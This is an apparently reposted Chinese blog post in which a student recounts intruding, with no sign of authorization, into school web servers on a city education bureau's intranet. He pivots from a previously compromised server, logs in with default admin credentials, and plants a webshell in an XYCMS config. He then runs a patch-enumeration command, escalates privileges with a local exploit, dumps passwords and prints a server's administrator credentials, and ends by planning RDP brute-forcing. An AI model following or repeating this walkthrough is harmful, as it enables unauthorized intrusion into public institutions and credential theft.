web渗透实例之克市教育局内网渗透—市十六小

引言:下午元旦搞活动不上课 在机房浪一波 想到上次内网提权了学校饭卡管理服务器 便把bugscan的节点加到这个服务器了因为那个服务器处于教育局内网 所以bugscan直接扫出来了很多内网ip的网站 渗透了一波 如 市三中 新一中 十八小 十六小等等之前暑假对教育局web站点渗透都是外围渗透 提交了新一中,五中,科技中心等网站。如今再内网渗透一番 果然几十万的防火墙设备不是盖的,而是。。。QQ图片20161230222805.jpg

正文:bugscan扫描到十八小网站这几个web站点

  QQ图片20161230223524.jpg

进去之后 发现直接目录浏览啊 666

QQ图片20161230223553.jpg

8011端口的站点 发现是xycms 试了下默认账号密码admin admin直接进去了 简直没毛病啊!

QQ图片20161230223559.jpg

XYCMS后台拿shell在配置里面 网站名称后面插入一句话就行

QQ图片20161230223602.jpg

然后菜刀连接地址http://172.20.72.131:8011/inc/config.asp 密码ssn菜刀里面试了下执行命令 权限不行 尴尬了直接传个asp大马在asp大马里面执行cmd也不行 看了下WScript.Shell开的 直接传个cmd执行命令好了

QQ图片20161230223606.jpg

权限不够 扫下服务器的补丁吧 先看看常用的那几个漏洞打补丁没

QQ图片20161230223609.jpg

dirc:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.logKB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.logKB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i“%i”||@echo %i NotInstalled!)&del/f /q /a a.txt可以看到KB952004.logNot Installed! KB956572.logNot Installed! KB2393802.logNot Installed! KB2503665.logNot Installed! KB2592799.logNot Installed! KB2621440.logNot Installed! KB2160329.logNot Installed! KB970483.logNot Installed! KB2124261.logNot Installed! KB977165.logNot Installed! KB958644.logNot Installed! 这些个补丁都没打直接用第一个pr提权传个pr然后执行是system权限

QQ图片20161230223614.jpg

这时候可以直接添加账户或者读取密码 我选择后者 传了个getpass到目录命名为1.exe用pr执行 命令D:\12\pr.exe "D:\12\1.exe>>D:\12\13.txt"直接把密码输出到D:\12\13.txt

QQ图片20161230223620.jpg

在菜刀打开这个txt文件看到了服务器账号密码UserName:AdministratorLogonDomain:K18Xpassword: k18x我擦嘞!又是弱口令!!!我决定了 以后直接在内网爆破3389端口 生成一套弱口令字典 分分钟k掉这些服务器啊

QQ图片20161230223626.jpg

总结:曾经一个叔叔给我讲了个笑话说教育局有几十万的防火墙设备 怎么可能功的进去 我就想说啊 暑假从外围进去之后再内网渗透 这些设备有什么用处没有绝对安全的系统 更何况漏洞出在人身上!

本博客所有文章如无特别注明均为原创。作者:ssnhy13 ,复制或转载请以超链接形式注明转自 克拉玛依市高级中学--十三年 。

本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论

// 360自动收录 // 360自动收录